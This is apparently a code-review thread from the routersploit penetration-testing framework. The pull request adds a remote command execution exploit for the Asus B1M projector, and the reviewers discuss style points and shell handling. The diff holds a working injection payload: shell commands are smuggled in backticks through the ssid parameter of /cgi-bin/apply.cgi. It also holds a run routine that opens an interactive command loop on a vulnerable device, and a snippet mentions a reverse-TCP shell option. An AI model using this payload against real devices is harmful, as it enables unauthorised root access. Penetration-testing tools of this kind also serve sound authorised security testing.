### PR TITLE
Asus B1M Projector RCE exploit

### PR DESCRIPTION
**Pull request by lucyoa**
Resolves: #240

### CODE REVIEW

File: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py [hunk 1]
```diff
@@ -0,0 +1,62 @@
...
+        'references': [
+            'https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/',
+        ],
+        'devices': [
+            'Asus B1M Projector',
+        ],
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
+    port = exploits.Option(80, 'Target Port')
```
Comment (fwkz) [inline routersploit/modules/exploits/misc/asus/b1m_projector_rce.py]: `validators.int`?

File: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py [hunk 2]
```diff
@@ -0,0 +1,62 @@
...
+
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            shell(self, architecture="mips")
+        else:
+            print_error("Target is not vulnerable")
+
+    def execute(self, cmd):
```
Comment (fwkz) [inline routersploit/modules/exploits/misc/asus/b1m_projector_rce.py]: Appropriate comment that state that this is a callback used by shell module would be good.

File: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py (hunk 1 above)
Comment (fwkz) [inline routersploit/modules/exploits/misc/asus/b1m_projector_rce.py]: Appropriate comment that state that this is a callback used by shell module would be good.

File: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py [hunk 3]
```diff
@@ -0,0 +1,62 @@
...
+        url = "{}:{}/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(self.target, self.port, cmd)
+
+        response = http_request(method="GET", url=url)
+        if response is None:
```
Comment (fwkz) [inline routersploit/modules/exploits/misc/asus/b1m_projector_rce.py]: I think we could make `shell()` method more resilient and avoid returning empty strings with

```python
# routersploit/shell.py:shell
# ...
            else:
                print_error("reverse_tcp <reverse ip> <port>")
        else:
            response = exploit.execute(cmd)
            response = response if response is not None else ""
            print_info(response)
```
in separate PR

**Comment by lucyoa** [comment]
Fixed

File: routersploit/modules/exploits/misc/asus/b1m_projector_rce.py [hunk 4]
```diff
@@ -0,0 +1,63 @@
...
+    def run(self):
+        if self.check():
+            print_success("Target is vulnerable")
+            print_status("Invoking command loop...")
+            shell(self, architecture="mips")
+        else:
+            print_error("Target is not vulnerable")
+
+    # callback used by shell functionality
+    def execute(self, cmd):
```
Comment (fwkz) [inline routersploit/modules/exploits/misc/asus/b1m_projector_rce.py]:
```python
def execute(self, cmd):
    """ callback used by shell functionality """
```

**Pull request merged**